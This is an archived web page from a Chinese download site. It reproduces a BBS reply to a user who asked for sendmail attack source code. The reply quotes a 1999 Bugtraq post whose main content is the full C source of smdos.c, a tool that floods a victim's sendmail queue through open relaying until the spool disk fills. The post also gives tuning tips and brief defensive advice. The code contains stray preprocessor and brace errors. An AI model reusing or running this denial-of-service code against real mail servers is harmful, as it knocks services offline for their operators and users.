⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 384.htm

📁 unix高级编程原吗
💻 HTM
字号:
🔍 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="385.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>

标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>

发信站: BBS 水木清华站 (Sat Aug  5 08:59:39 2000) <br>

  <br>

Date: Sat, 3 Apr 1999 00:42:56 +0200 <br>

From: "[iso-8859-2] Micha?Szyma駍ki" <siwa9@BOX43.GNET.PL> <br>

To: BUGTRAQ@netspace.org <br>

Subject: Re: Possible local DoS in sendmail <br>

Hi folks, <br>

This local queue filling DoS attack in sendmail is quite dangerous. But good <br>

security policy (like mine) will prevent attackers from doing such things. <br>

Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by <br>

root.attacker's_group; turn on quotas for group 'attacker's_group' on the <br>

file system containing /var/spool/mqueue directory, and your host will be not <br>

vulnerable; but you _have to_ configure your sendmail as _nosuid_ daemon; <br>

Much more dangerous are remote queue filling DoS attacks. If you have enabled <br>

relaying, you can use shown below smdos.c proggie; it will quite fast fullfill <br>

partition on disk where /var/spool/mqueue resides. you should notice increased <br>

LA during attack; in contrast to local DoS attacks, control files created by <br>

smdos.c are owned by root.root, so ... it's much more difficult to prevent <br>

offenders from doing it; <br>

don't forget to change BSIZE definition (in smdos.c) to appropriate victim's <br>

host message size limitation (MaxMessageSize option); you can also increase <br>



MAXCONN definition. <br>

smdos.c: <br>

--- CUT HERE --- <br>

/* <br>

By Michal Szymanski <siwa9@box43.gnet.pl> <br>

Sendmail DoS (up to 8.9.3); <br>

Sat Apr  3 00:12:31 CEST 1999 <br>

*/ <br>

#include <stdio.h> <br>

#include <sys/types.h> <br>

#include <sys/socket.h> <br>

#include <netinet/in.h> <br>

#include <arpa/inet.h> <br>

#include <netdb.h> <br>

#include <errno.h> <br>

#undef VERBOSE          /* define it, if MORECONN is undefined */ <br>

#define MORECONN <br>

// #define RCPT_TO      "foo@ftp.onet.pl" <br>

#define RCPT_TO "foo@10.255.255.255" <br>

#ifdef MORECONN <br>

#define MAXCONN 5 <br>

#endif <br>

#endif <br>

#define BSIZE   1048576         /* df* control file size */ <br>

#define PORT    25 <br>

char buffer[BSIZE]; <br>

int sockfd,x,loop,chpid; <br>

void usage(char *fname) { <br>

fprintf(stderr,"Usage: %s <victim_host>\n",fname); <br>

exit(1); <br>

} <br>

void say(char *what) { <br>

if (write(sockfd,what,strlen(what))<0) { <br>

perror("write()"); <br>

exit(errno); <br>

} <br>

#ifdef VERBOSE <br>

fprintf(stderr,"<%s",what); <br>

#endif <br>

bzero(buffer,BSIZE); <br>

usleep(1000); <br>

if (read(sockfd,buffer,BSIZE)<0) { <br>

perror("read()"); <br>

exit(errno); <br>

} <br>

} <br>

#ifdef VERBOSE <br>

fprintf(stderr,buffer); <br>

#endif <br>

} <br>

  <br>

int main(int argc,char *argv[]) { <br>

struct sockaddr_in serv_addr; <br>

struct hostent *host; <br>

char *hostname,hostaddr[20]; <br>

fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n"); <br>

if (argc<2) usage(argv[0]); <br>

#ifdef VERBOSE <br>

fprintf(stderr,">Preparing address. \n"); <br>

#endif <br>

hostname=argv[1]; <br>

serv_addr.sin_port=htons(PORT); <br>

serv_addr.sin_family=AF_INET; <br>

if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) { <br>

#ifdef VERBOSE <br>

fprintf(stderr,">Getting info from DNS.\n"); <br>

#endif <br>

if ((host=gethostbyname(hostname))==NULL) { <br>



herror("gethostbyname()"); <br>

exit(h_errno); <br>

} <br>

serv_addr.sin_family=host->h_addrtype; <br>

bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length); <br>

#ifdef VERBOSE <br>

fprintf(stderr,">Official name of host: %s\n",host->h_name); <br>

#endif <br>

hostname=host->h_name; <br>

sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0], <br>

                               (unsigned char)host->h_addr[1], <br>

                               (unsigned char)host->h_addr[2], <br>

                               (unsigned char)host->h_addr[3]); <br>

} <br>

else sprintf(hostaddr,"%s",hostname); <br>

#ifdef MORECONN <br>

for (;loop<MAXCONN;loop++) if (!(chpid=fork())) { <br>

#endif <br>

for(;;) { <br>

bzero(&(serv_addr.sin_zero),8); <br>

if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) { <br>

perror("socket()"); <br>



exit(errno); <br>

} <br>

if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) { <br>

perror("connect()"); <br>

exit(errno); <br>

} <br>

#ifdef VERBOSE <br>

fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT); <br>

#endif <br>

bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE); <br>

#ifdef VERBOSE <br>

fprintf(stderr,buffer); <br>

#else <br>

fprintf(stderr,"."); <br>

#endif <br>

say("helo foo\n"); <br>

say("mail from:root@localhost\n"); <br>

say("rcpt to:" RCPT_TO "\n"); <br>

say("data\n"); <br>

for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE); <br>

say("\n.\n"); <br>

say("\n.\n"); <br>



sleep(1); <br>

say("quit\n"); <br>

shutdown(sockfd,2); <br>

close(sockfd); <br>

#ifdef VERBOSE <br>

fprintf(stderr,">Connection closed succesfully.\n"); <br>

#endif <br>

} <br>

#ifdef MORECONN <br>

} <br>

waitpid(chpid,NULL,0); <br>

#endif <br>

return 0; <br>

} <br>

--- CUT HERE --- <br>

  <br>

【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>

: 如题 <br>

  <br>

  <br>

-- <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="385.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -